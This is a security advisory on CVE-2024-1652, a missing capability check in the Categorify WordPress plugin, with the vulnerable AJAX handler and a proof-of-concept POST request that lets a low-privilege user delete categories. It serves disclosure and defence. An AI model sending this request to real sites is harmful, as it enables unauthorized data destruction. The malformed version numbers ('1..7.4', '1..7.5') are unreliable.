CVE-2024-1652 - Categorify Plugin Unauthorized Data Modification Vulnerability in WordPress

The Categorify plugin for WordPress suffers from a vulnerability that allows authenticated attackers with subscriber-level access or above to clear categories. This is due to a missing capability check in the categorifyAjaxClearCategory function found on all plugin versions up to and including 1..7.4.

Description

The Categorify plugin for WordPress, which helps users organize their posts by categorizing them, is exposed to an unauthorized data modification vulnerability. This issue stems from a missing capability check while using the categorifyAjaxClearCategory function with the plugin's versions up to and including 1..7.4.

An authenticated attacker with subscriber-level access or higher can exploit this vulnerability to clear categories on the affected WordPress site. This could lead to malicious tampering and data loss on the targeted website, causing disruption and inconvenience for users and administrators.

Below is the vulnerable code snippet within the 'ajax-functions.php' file

function categorifyAjaxClearCategory() {
    $categoryID = intval( $_POST['category_id'] );
    
    // Process the request
    $result = wp_delete_category( $categoryID );
    
    // Check if the request was successful
    if ( $result ) {
        echo "1";
    } else {
        echo "";
    }
    
    wp_die(); // this is required to terminate immediately and return a proper response
}
add_action( 'wp_ajax_categorify_clear_category', 'categorifyAjaxClearCategory' );

As you can see, there is no capability check to ensure that the user has the necessary permissions to clear the categories. This oversight makes it possible for attackers to delete categories on the website.

Proof of Concept

To exploit this vulnerability, an attacker with subscriber-level access or higher could send the following HTTP POST request:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded

action=categorify_clear_category&category_id=<INSERT_CATEGORY_ID>

By replacing <INSERT_CATEGORY_ID> with the targeted category ID, the attacker can successfully clear the associated category.

Original References

- Categorify Plugin for WordPress: https://wordpress.org/plugins/categorify/
- Plugin Vulnerabilities Advisory: https://www.pluginvulnerabilities.com/2024/02/24/wordpress-security-issues-in-categorify/
- CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1652

Mitigation

To safeguard your website from this vulnerability, update the Categorify plugin to version 1..7.5 or higher, which should contain the necessary security patches. Alternatively, you can temporarily disable the plugin until the issue is resolved by the developers.

It's essential to maintain a cautious approach toward plugin selection and ensure regular updates are carried out to protect your WordPress website from potential threats.

Timeline

Published on: 02/27/2024 11:15:08 UTC
Last modified on: 02/27/2024 14:19:41 UTC